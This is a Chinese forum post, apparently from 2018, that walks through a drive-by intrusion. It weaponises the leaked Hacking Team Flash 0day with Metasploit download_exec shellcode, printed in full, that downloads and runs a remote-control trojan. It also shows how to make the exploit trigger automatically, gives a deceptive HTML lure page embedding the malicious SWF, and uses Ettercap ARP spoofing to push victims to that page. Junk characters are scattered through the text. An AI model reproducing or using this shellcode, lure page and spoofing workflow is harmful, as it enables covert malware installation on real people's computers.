|
; w* n1 H" O( n
三、flash 0day之手工代码修改制作下载者实例入侵演示
" j) X+ F1 y7 X
3 ^' h) i$ w' O3 Y
5 n' r3 _. {2 v4 F. B: t3 I* }8 P 利用到的工具:
( V, K; h& u) q! e 8 q7 ]. X2 D7 V
. d0 A, d/ u, I! c$ t/ A; A Msf & f6 t" X3 n6 j6 P$ Q" y4 U5 L
* t& I% k ~0 \, c) P7 {
! s- g$ Z W9 x& o" Y1 ]# E( r Ettercap
5 n o" e; d$ u( N, W I/ ?
" a8 j3 H0 I1 Y S$ H# T, E! ^6 z
Adobe Flash CS6 & v0 Q; ?9 w( c1 h) X
2 `. x) {% P$ I/ }* }7 j, o2 T$ d% x( r. J' x( @/ t6 H5 Y+ T
Hacking Team Flash 0day-可冲破Chrome沙盒-Evil0X源代码一份
: F4 r3 ^: F9 y1 ]4 c0 d& ^ , o9 \( H# L% Q4 j% ]7 p( b/ g
# O' [, n; i% R" Z( \) u8 j 下面我们就开始演示入侵,利用msf生成shellcode,首先打开msf执行use windows/download_exec,show options ! {5 e$ ^, Z4 }9 {! j9 o
6 J( Z, q! Y: Z
8 W" f$ `. C4 q, g* K 如图:
# w" |; i( I# [2 u3 @% ^
0 ~% A' {0 ~( U9 ?
' Q+ ?. Q% V+ }" f8 x! t & ]4 W" Q& p$ d* t' O/ j1 ^/ Z' J" b
0 ~ C. g' X" N7 P" e- l. R. b* W! c( f7 I
 . @& M! b' J8 H4 m0 m. y% Z; @
3 v* B+ N- G9 }
1 \8 R& d$ `$ b4 K2 T. V- b/ d 然后set EXE system.exe,再执行set URL,需要说明一下URL就是我们的马的下载地址,这里我们用远控马,远控配置使用不再详细说明。。。如图: ' Q7 ]4 {# C3 H, I8 g: P( T
% m6 I+ b N9 t: I3 V
. n0 Y! z( u7 j" v- ~# |' Z3 t7 O2 |
7 u/ K2 U7 n# c- B8 H 6 P# o% h Z1 a& w2 `. y% H
6 @9 z# f6 w, b6 R9 G 
& {$ X7 n: N& e, I ) |# ^, G u J
# _- x3 X9 k9 U8 q& n
然后执行generate -t dword生成shellcode,如下: 0 n% z- i x1 S- J
5 {+ s( B9 o' P) A0 b+ x* h$ F) J
+ v* m+ k" Z0 }' |; R 
$ G1 _5 l* `- b
: c; p% j# j Y' B0 o$ s. C" z1 T0 _& M
复制代码到文本下便于我们一会编辑flash exp,如下: ) R6 [# X& F& D& p+ k0 I! ]
2 i6 H, o. x3 v# H# ~8 l5 a! a; U3 J3 \0 a. b6 L) k
0x0089e8fc, 0x89600000, 0x64d231e5, 0x8b30528b, 0x528b0c52, 0x28728b14, 0x264ab70f, 0xc031ff31, - u1 a8 i1 ?. ]
$ j$ }* W5 T+ K a5 m: e7 n5 m3 s: C8 |9 S% }
0x7c613cac, 0xc1202c02, 0xc7010dcf, 0x5752f0e2, 0x8b10528b, 0xd0013c42, 0x8578408b, 0x014a74c0,
) I* S; I3 B' \ 2 c5 e1 F, O# r. c2 ~' s# D
, ^; Q( F6 N7 |! l5 w N
0x488b50d0, 0x20588b18, 0x3ce3d301, 0x8b348b49, 0xff31d601, 0xc1acc031, 0xc7010dcf, 0xf475e038, ) J; m8 X/ {; ~- K. V& }: @
- F+ Q+ h7 ^/ [* t8 {) |2 Y8 Z8 K
7 W, b, k' A8 J& T% R0 P/ w# O
0x3bf87d03, 0xe275247d, 0x24588b58, 0x8b66d301, 0x588b4b0c, 0x8bd3011c, 0xd0018b04, 0x24244489,
% k) [" p1 N& C2 v
. @! q2 u7 [1 O2 m6 n9 _
; ?$ e8 ^1 g( i0 g, }3 E 0x59615b5b, 0xe0ff515a, 0x8b5a5f58, 0x5d86eb12, 0x74656e68, 0x69776800, 0xe689696e, 0x774c6854,
5 d; t w+ Z/ a+ V4 J( S
* @4 ]$ D! X% b/ ]5 ^" ^2 o! \- L
) C" U, `, J1 x5 }2 l: q 0xd5ff0726, 0x5757ff31, 0x68565757, 0xa779563a, 0x60ebd5ff, 0x51c9315b, 0x51036a51, 0x53506a51, 3 y2 i7 v% B- N$ L o: k
0 k8 ~8 z0 B/ k+ e4 r; u2 p$ D0 Z/ z8 H
0x89576850, 0xd5ffc69f, 0x31594feb, 0x006852d2, 0x52846032, 0x52515252, 0x55eb6850, 0xd5ff3b2e,
/ w1 t% ^/ m9 _ ' r6 Y' z8 }4 Z: r1 I' c
0 h- C+ ]( v5 {, h' s' S7 B9 N 0x106ac689, 0x3380685b, 0xe0890000, 0x6a50046a, 0x7568561f, 0xff869e46, 0x57ff31d5, 0x56575757, 2 R/ ? N/ R6 z# K
: M' N2 s+ j/ i z9 E' W
* R5 E" w0 U- Q% m) i. q: l 0x18062d68, 0x85d5ff7b, 0x4b1f75c0, 0x007c840f, 0xd1eb0000, 0x00008ee9, 0xfface800, 0x732fffff,
; b4 h' U2 I8 e/ T5 |# H ) l2 s: O, U- r0 D6 h* H- |
/ e+ x* r9 R4 s# E" H ~6 d
0x65747379, 0x78652e6d, 0x6beb0065, 0x505fc031, 0x026a026a, 0x6a026a50, 0xda685702, 0xff4fdaf6,
" r) g, ?" n& n; c! g1 t + u9 d( W6 X3 D5 `1 T
) Z, \1 W$ W! \' j
0xc03193d5, 0x0304b866, 0x8d54c429, 0x3108244c, 0x5003b4c0, 0x12685651, 0xffe28996, 0x74c085d5, ( O9 B. T; S0 S- | S( Y
2 [8 O$ F8 R$ d# b! t
8 q6 x& X- @& q1 g4 b8 I- [/ k+ K 0xc085582d, 0x006a1674, 0x448d5054, 0x53500c24, 0xae572d68, 0x83d5ff5b, 0xceeb04ec, 0x96c66853, + g& S: A7 `; { d$ r
* l' [, r4 p7 K. Y
! [+ F4 v$ b. C) I. J0 D7 A 0xd5ff5287, 0x6857006a, 0x876f8b31, 0x006ad5ff, 0xa2b5f068, 0xe8d5ff56, 0xffffff90, 0x74737973,
- ~6 {) y) R- E- K 5 C5 v% z8 Y# {- `
" Q" `7 Y# r$ r. v, y8 D 0x652e6d65, 0xe8006578, 0xffffff08, 0x2e737378, 0x64696162, 0x6b682e6f, 0x00000000
, u8 p4 f/ r; j6 J& V4 ] 5 u) G. d# W1 l0 X, v; ] P; C- c
/ r4 Q# V: F H7 K- N
q7 c L9 b( s% ]* W
; U7 Q" t% u. F6 _: f
5 @5 t. p" k8 z e6 P. W. \# B3 s # C5 R9 l1 r3 h- z( P1 T, P
+ t Q/ Y; q% k+ `" S2 ?
2 u6 ~) r+ b* y8 l 下面我们来修改flash 0day exp,需要修改三个文件,分别为: 2 D% X* F4 k& w* v0 Z# `7 J
: Q8 f: S7 F; T$ {8 {" l
! A, B" r. x( D/ N+ M 
2 E/ k$ j& B& y 8 @2 g2 |4 t4 f) T2 F
/ a( B5 y; x. @0 B4 k+ C7 i
先修改ShellWin32.as,部分源代码如图: . n) q( j! c! D# U! |# ]; u! u
: i; d- t1 _# x$ z
k3 m* i5 }8 ~0 k X: M# ` R
. [; ?. c9 Y: c. Y" I" c4 o$ l
! b5 d$ E8 Z+ C& Q! ^1 w( ?0 l' d; x. e0 M1 _; O
我们需要把标记处[]中的代码改成用msf生成的代码,修改后如下:
" h1 D7 l: G. q ! l, m1 ?! C; M0 Q
/ `, h4 W8 u* P4 s( v- E& _5 u 
, r5 x5 r2 r9 m9 d9 w. F! ] ' I8 G+ r/ n: W+ L/ ~$ A
/ y2 d, H) B7 O3 _) j" t 然后保存,ShellWin64.as的修改方法如上述,不再演示,下面我们来修改myclass.as,这里需要说明一下,因为此exp生成的利用程序,不能直接自动触发flash漏洞,也就是需要点击按钮才可以,实际上在做渗透的时候需要把它搞得更完美,所以就需要修改,修改方法:搜索myclass的某个字符doc.addchild(btn);如图: $ T- {7 b* a$ ~3 }# L
8 n9 x9 K0 n& j3 }
( J) f* H* j( P. I  6 x0 N, o/ i1 @; Q/ M# g' i
) B7 J+ i( W$ `$ z
- V3 c$ I4 ^3 L: P0 V 换行在后面加一句TryExpl();注意是l不是数字1,然后如图:
+ a6 {; Z0 v+ E0 m) a% ]) }- C8 H2 `% I
4 e6 T' x; W ?+ Y6 t) G2 h4 G2 }/ A+ e5 e- p' T m9 f
8 J7 v% |& U p2 h % z" n e X% Q/ h
" j' \: J" H. _
- z" i9 o6 D1 A9 A7 ], {1 j/ ]
! a, ?0 d1 S; s$ Q& L) Q S4 l7 ^- M0 c: R2 H( \5 w' Z! U
 * K. L* q* r2 \+ z
C# \" n& n6 U! o
! ` g4 ~) N$ F" G2 k1 D# |3 X! U
然后点保存,下面我们来编译一下,打开
9 v2 Y5 b* J% D' ~
1 k! f$ q6 E, ]* n8 _* \$ c) O0 j+ d4 N- A( _* T
exp1.fla然后点文件-发布,看看编译没错误
6 Q: n' D R. P+ N0 Y. ]. a; i . ?. k. Y6 C$ t6 E
: S4 g5 }% [1 y: y- ?3 t ; i3 i7 ]" S* z) y# j8 o
5 G0 Q3 ]) [* ]1 l$ m
0 H% N; C) W- k9 I6 W1 P' U
/ U* q7 [: G3 ?7 t) u# R $ l$ q2 h6 s9 b' b" e
* h& j! k% F$ \1 d8 q# v9 k! {
3 ^: [) i: `& E- `& P) e
: d+ _+ E) b5 b8 g, B6 J
! Q$ H; A, ^$ H# U- G  + O( `+ d3 k4 c
% H4 ^, }# j$ @ Y, n, j: x U
# Q% E) H+ }: R: w. Y$ ~) h4 Q 然后我们把生成的 0 Z( W) }* X4 i; H# c
# U4 J7 L: ^5 L/ G4 z" v; [
7 _1 k6 s) L! v" ?, S exp1.swf丢到kailinux 的/var/www/html下: 4 l! l- o" P* @) Q
. f1 l$ A% b1 }+ Y0 n
9 q+ M- G2 D) P) L% X7 ~# o 然后把这段代码好好编辑一下 " I# Z9 d& ?# ?/ ?% s4 \& l
1 c8 x2 z6 u( p4 Q9 C
6 R! V. n4 @7 O1 p+ n1 g
' P H: ?* N! \/ e7 L8 Z6 L
5 i& V( k9 }6 l* _; r
" c$ d' w2 }: T# t& O
7 n0 q) s; V% ?! \9 w . R" ^6 w; t+ J n% C3 ~) c
# m0 b& T( v! D! c
: T1 D& J5 `" I5 ?5 |0 ~
$ C5 A; N! [# Z9 o: V. O# \9 }" z% C; s- \+ X' {) T* W
4 U5 u8 ]! c: x7 e3 x; l
1 q- J9 L: k N4 \8 P) z, G
( m/ u- B2 n% C3 K8 ~0 [ L
; P: J9 E. h( J4 p. x9 a
) _( x- U3 b% G3 s* T
) s$ z# b' }4 E: t o3 l* v9 a
$ |5 I: @. r8 ?0 Y0 P
4 l s1 Q" N* ` Y! ]
) w: b' I) k5 n
<!DOCTYPE html> # ^# L) {3 r* A8 D0 I
) U0 c" ?- K) w6 c: M
! }8 t7 P \- i J+ |! T- f
<html>
7 r. B9 U5 C# F _ w2 @7 m/ f 1 h% F. n- R1 a, \" N8 Z2 [/ u
( E/ @2 o1 o- {2 L0 ^7 w <head>
& B% i5 s; F4 ~/ s2 Y w / `5 R2 i2 R7 p# N
1 I7 ^9 B* d5 a2 B6 W <meta http-equiv="Content-Type" content="text/html; 0 k/ Q7 R9 Z! S4 W, C
- Y6 M" Y; d' U# V a4 n7 T4 @+ L$ G- Y6 |$ z& }+ K5 }4 {
charset=utf-8"/>
$ L [& j* Y. r+ z2 P; e1 [) ~ 1 k! k1 B$ A4 m2 S6 Q9 X: Z, d/ t
8 X( r) W! f8 o* q& R, B* b </head>
! D" P3 b2 D0 |8 z n' e! U
$ P7 L5 g3 A1 { h% U6 T
4 y3 {8 I' m' o: g1 q <body> 2 V' x v2 U( h. }( c z
- `& H" K7 g a0 ]
$ L) }- B9 d/ a' r j) e8 l2 I8 a <h2> Please wait, the requested page is loading...</h2>
7 K4 q9 U1 n0 p0 j$ e0 v( Y 6 v8 E! _" i i( y2 V" W
& Q/ ~" d) T& I3 o
<br>
' K% _! v+ j' }4 f; _
' ?( C9 z! |% N0 i7 X8 f) P# m+ B5 q- a# E) X
<OBJECT 8 t$ D: b. n1 t2 b
) H" w" F& K+ z% h) H
, o0 _/ j3 U3 N7 }- h
classid="clsid 27CDB6E-AE6D-11cf-96B8-444553540000" WIDTH="50" HEIGHT="50" id="4">< ARAM NAME=movie
0 b+ w M v6 }0 ` : a. l# i* F) v) ^; |9 h3 F6 X
/ z6 @# x$ e, m
VALUE="http://192.168.0.109/exp1.swf"></OBJECT>
) U6 K2 f% F! ~
) g; V2 E. k7 O- W1 @
/ A- `& T, q: X) R </body>
2 M2 L# ]( K: |5 h5 L. x0 j& Q ' ~/ V: c1 U. y0 x
- Q, d6 z/ }& ]) r4 e. E; q
<script>
+ x/ f$ R" J5 ?4 z( M ! X. C5 G+ k$ v% `
" ]; L! X) l. D, R# x2 m
setTimeout(function () {
& i O! z5 r7 b: c$ j: p 9 t/ V4 ] {* P
8 L! H) ]' T+ }. i/ ?$ N8 Q 1 M* K, W2 |, I+ \& C
( L7 ~5 O& J, W0 r- L1 Q# A- \- I
3 V7 V' ~9 y1 V1 n8 O9 h
window.location.reload();
; B( ?' i) N, M' w" a w; M. H/ O" l* P, a. |( j
- c5 Y7 `+ u8 F4 L }, 10000);
3 y7 b5 ~9 P& I1 c7 _/ p. U
% W' J& ^9 x+ ^ S
! \, ?1 u* J7 j4 v( {' I6 z; a
! p. G5 f+ ~0 l7 h3 {3 o8 M8 P$ b6 \ 7 l0 d- |4 q- k; V8 ?. g8 T* i: \
/ ^; {) M3 O' R: ~8 F: ]$ ~
</script> ! b3 S4 A+ p) l6 v1 k
" w. _9 S: b0 d; {1 I
* E$ J4 u! T% \9 ~+ l$ i </html>
& p, P% r& b! {7 G) w6 j5 t + u* u( a' f; \0 [
7 f4 @! z& P/ C3 ~8 H2 f; Y' j' [ ! T3 I% h+ y$ b
$ Q) r/ T& s$ Y; O+ q( f
; O6 @9 M6 j& r4 X/ j" g1 H, S/ f
注意:192.168.0.109是kali的ip地址,这时候我们需要service apache2 start启动一下web服务,然后将上面的html保存为index.htm同样丢到kali web目录下,测试访问链接存在如图: 6 ]% f `1 A& m* u5 W1 g
. H! e2 q' i) u1 _8 b# E
# i: v% i6 M4 p% t( C 
) d& i0 h# q8 \1 N- q' x9 y; V% W
% w5 t# s2 i% O. C+ A1 ~" D& [$ m2 ?( I5 c: J) H0 u1 D) T
- P8 ]# o/ p, k B
' l3 i/ K# C2 {. }6 s, _$ ^: W
6 E% }* K% w# s0 ~8 {( s. ]
& z$ E& L3 f. Q5 s/ ?4 X- q
- U0 y. G; l( F# N( _8 ?8 e6 E
: I) X1 M% f+ w ' i8 r/ i- B* i
% t8 d* E/ @+ ^+ q$ u
5 N; w; ]6 r; s. e$ G$ W
/ ~7 F+ r) @* a5 Q 0 V# `* i! u# d3 k/ _ g: G
+ F4 ~! c, X: { 下面我们用ettercap欺骗如图: 3 h7 H1 |# s1 j
1 c) |3 I* R+ Z
& _2 p( N$ M' P/ Z% n 
% F" i" M6 p1 h. g$ I 1 A x$ m' d8 `9 _! p5 ]4 Q% e
3 ^( s0 m" n/ {
5 R5 \7 r3 [% x& Z2 E- s1 |4 p " I/ P6 R! u5 ` g# R( F- Z
8 a. f4 m3 J! S9 J/ o2 I
下面我们随便访问个网站看看:
0 s- s) ~5 j$ |' E1 ]/ {8 M ( x m5 o( a# ~2 ]" S0 r
+ q, z7 E; {+ f( P) s! ? 我靠我发现直接用ettercap欺骗物理机装了腾讯管家照样可以欺骗成功,如图:
2 ]5 m2 T1 e6 ^3 _3 t# w9 k: d 6 K8 C6 S/ c9 k$ d# Z) S6 M
1 X0 m9 K9 m4 b8 q2 ] 
, h9 V. t) ]/ H
; X# z& I) T4 C; t: ^2 H3 q7 Q c; N4 e9 q @9 V
我们看另一台, - _1 z- J, @! U$ r( I b
* P0 |0 O, x: z2 |
. V6 }0 L; c8 V. q: F+ f- | 提示这个错误,说明木马是成功被下载执行了, 只是由于某些原因没上线而已。。。
& g& P7 R! P( Z5 ` | 
发表于 2018-10-20 20:28:55
收藏
支持
反对